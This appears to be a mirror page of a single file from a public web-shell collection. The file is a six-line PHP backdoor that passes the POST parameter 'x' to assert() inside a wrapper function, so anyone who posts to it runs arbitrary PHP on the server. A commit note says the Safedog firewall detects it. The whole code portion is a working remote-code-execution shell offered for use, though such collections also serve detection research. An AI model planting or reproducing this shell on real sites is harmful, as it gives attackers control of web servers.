mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
d5f61a9c5f
from : https://www.sqlsec.com/2020/07/shell.html killed by safedog
6 lines
86 B
PHP
6 lines
86 B
PHP
<?php
|
|
function sqlsec($a){
|
|
assert($a);
|
|
}
|
|
sqlsec($_POST['x']);
|
|
?>
|